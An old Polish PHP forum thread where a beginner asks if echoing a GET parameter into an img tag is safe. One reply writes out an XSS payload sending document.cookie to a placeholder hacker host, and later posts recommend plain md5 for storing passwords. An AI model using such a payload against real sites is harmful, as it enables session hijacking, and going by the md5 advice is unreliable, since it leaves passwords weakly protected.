Forum PHP.pl

Forum PHP.pl > Forum > PHP

Bezpieczeństwo.., Kod bezpieczny?

lol666 Zobacz profil	23.08.2006, 21:40:39 Post #1
Grupa: Zarejestrowani Postów: 6 Pomógł: 0 Dołączył: 14.08.2006 Ostrzeżenie: (0%)	Pytam się na wszelki wypadek. [PHP] pobierz, plaintext <?php echo '<img src="' . $_GET['adres'] . '">'; ?> [PHP] pobierz, plaintext Są jakieś inne metody umieszczania grafik w php? Z góry dzięki.

Start new topic

Odpowiedzi (1 - 10)

nazihipi Zobacz profil	23.08.2006, 21:49:01 Post #2
Grupa: Zarejestrowani Postów: 139 Pomógł: 0 Dołączył: 14.07.2006 Ostrzeżenie: (10%)	nie jest bezpieczny Temat: Bezpieczenstwo skryptow php

My4tic Zobacz profil	23.08.2006, 21:50:13 Post #3
Grupa: Zarejestrowani Postów: 260 Pomógł: 0 Dołączył: 4.08.2005 Ostrzeżenie: (0%)	No jak bedziesz to robił tak jak napisałes to na pewno nie bedzie to bezpieczne. Filtruj dane pobierane od usera takimi funkcjami jak http://pl2.php.net/manual/pl/function.strip-tags.php" title="Zobacz w manualu php" target="_manual. Poza tym możesz wprowadzić limit długości, sprawdzac rozszerzenie... możliwości jest sporo.

lol666 Zobacz profil	23.08.2006, 23:09:40 Post #4
Grupa: Zarejestrowani Postów: 6 Pomógł: 0 Dołączył: 14.08.2006 Ostrzeżenie: (0%)	Mam jeszcze pare pytań: 1. o co chodzi z tym /etc/passwd 2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi lub serwerowi (sry jestem zielony w php). Podajcie może jakiś przykład. Dzięki za wszelkie porady (IMG:http://forum.php.pl/style_emoticons/default/happy.gif) Pozdro z nad morza Maks Ten post edytował lol666 23.08.2006, 23:11:50

nasty Zobacz profil	23.08.2006, 23:16:28 Post #5
Grupa: Zarejestrowani Postów: 634 Pomógł: 14 Dołączył: 27.05.2006 Skąd: Berlin Ostrzeżenie: (0%)	Cytat o co chodzi z tym /etc/passwd chodzi o to ze to bylo nie bezpiczny plik, i sporo wlamow bylo robionych po odczytaniu hasla z niego (brute-force) ale to jakies 10 lat temu (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

nazihipi Zobacz profil	23.08.2006, 23:17:37 Post #6
Grupa: Zarejestrowani Postów: 139 Pomógł: 0 Dołączył: 14.07.2006 Ostrzeżenie: (10%)	Cytat 2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi (sry jestem zielony w php). Podajcie może jakiś przykład. [HTML] pobierz, plaintext http://www.twojastrona.pl/index.php?adres=dupa_admina.jpg [HTML] pobierz, plaintext [PHP] pobierz, plaintext <?php echo '<img src="' . $_GET['adres'] . '">'; ?> [PHP] pobierz, plaintext output: [HTML] pobierz, plaintext <img src='dupa_admina.jpg'> [HTML] pobierz, plaintext a co najgorsze można próbować ataków, polegających na wrzucaniu fragmentów kodu php, które namieszają pozytaj w manualu

Cysiaczek Zobacz profil	23.08.2006, 23:18:53 Post #7
Grupa: Moderatorzy Postów: 4 465 Pomógł: 137 Dołączył: 26.03.2004 Skąd: Gorzów Wlkp.	/etc/passwd to plik zawierający hasła (zwykle kodowane) użytkowników serwera (w domyślnej konfiguracji). Podstawy Linuxa (IMG:http://forum.php.pl/style_emoticons/default/laugh.gif) Ktoś może Ci po prostu wpisać w url ścieżkę do tego pliku i ewentualnie coś jeszcze przydkiego porobić. (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Pozdrawiam.

dr_bonzo Zobacz profil	23.08.2006, 23:33:13 Post #8
Grupa: Przyjaciele php.pl Postów: 5 724 Pomógł: 259 Dołączył: 13.04.2004 Skąd: N/A Ostrzeżenie: (0%)	Cytat 2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi (sry jestem zielony w php). Podajcie może jakiś przykład. [PHP] pobierz, plaintext <?php echo '<img src="' . $_GET['adres'] . '">'; ?> [PHP] pobierz, plaintext index.php?adres="><script>document.location='http://www.strona-hackera.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> cos w tym stylu -- czyli haker (cracker -- no niewazne) pobierze wartosc naszego ciacha sesyjnego, co moze mu pozwolic zalogowac sie na nasze konto bez znajomosci hasla. Przyklad stad: http://www.cgisecurity.com/articles/xss-faq.shtml index.php?adres="http://server.hackera.com/cookie_harvester.php?

lol666 Zobacz profil	24.08.2006, 10:13:05 Post #9
Grupa: Zarejestrowani Postów: 6 Pomógł: 0 Dołączył: 14.08.2006 Ostrzeżenie: (0%)	JEZU :exclamation: SAMOZAGŁADA! Dobra kontynuuje pytania: Wiem że algorytm z dziedziny kryptografii... (http://pl.wikipedia.org/wiki/MD5), ale jakie jest jego praktyczne zastosowanie w php?

kszychu Zobacz profil	24.08.2006, 10:23:19 Post #10
Grupa: Przyjaciele php.pl Postów: 2 712 Pomógł: 23 Dołączył: 27.10.2003 Skąd: z kontowni Ostrzeżenie: (0%)	Cytat(Cysiaczek @ 24.08.2006, 00:18 ) /etc/passwd to plik zawierający hasła (zwykle kodowane) użytkowników serwera (w domyślnej konfiguracji). Podstawy Linuxa (IMG:http://forum.php.pl/style_emoticons/default/laugh.gif) Głupoty pleciesz. /etc/passwd nie zawiera żadnych haseł, ale i tak nie wskazane jest, by ktoś obcy poznał jego zawartość. @lol666: praktyczne zastosowanie md5 w php (wszędzie indziej z resztą też) to przede wszystkim kodowanie haseł, sumy kontolne plików i pewnie inne jeszcze. Ja używam głównie do tego.

Ja_Szczur Zobacz profil	24.08.2006, 10:29:01 Post #11
Grupa: Zarejestrowani Postów: 115 Pomógł: 0 Dołączył: 4.12.2005 Skąd: Strzyżów Ostrzeżenie: (0%)	np. przechowywanie haseł w bazie przy rejestracji: [PHP] pobierz, plaintext <?php zapisz_usera( $_POST['nick'] , md5( $_POST['pass'] ) , $_POST['email'] ); ?> [PHP] pobierz, plaintext przy logowaniu: [PHP] pobierz, plaintext <?php if( md5( $_POST['pass'] ) == $haslo_z_bazy_shashowane_md5 ) // zalogowany else // złe hasło! ?> [PHP] pobierz, plaintext takie hasło ma zawsze 32 znaki no i jest mała szansa na powtórzenie takiego hash'a

« Następny starszy · PHP · Następny nowszy »

Reply to this topic

Start new topic

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 24.08.2025 - 00:19

Powered By IP.Board © 2025 IPS, Inc.
All changes by PHP.pl Administrators

Hosting zapewnia

NQ.pl hosting, trac, svn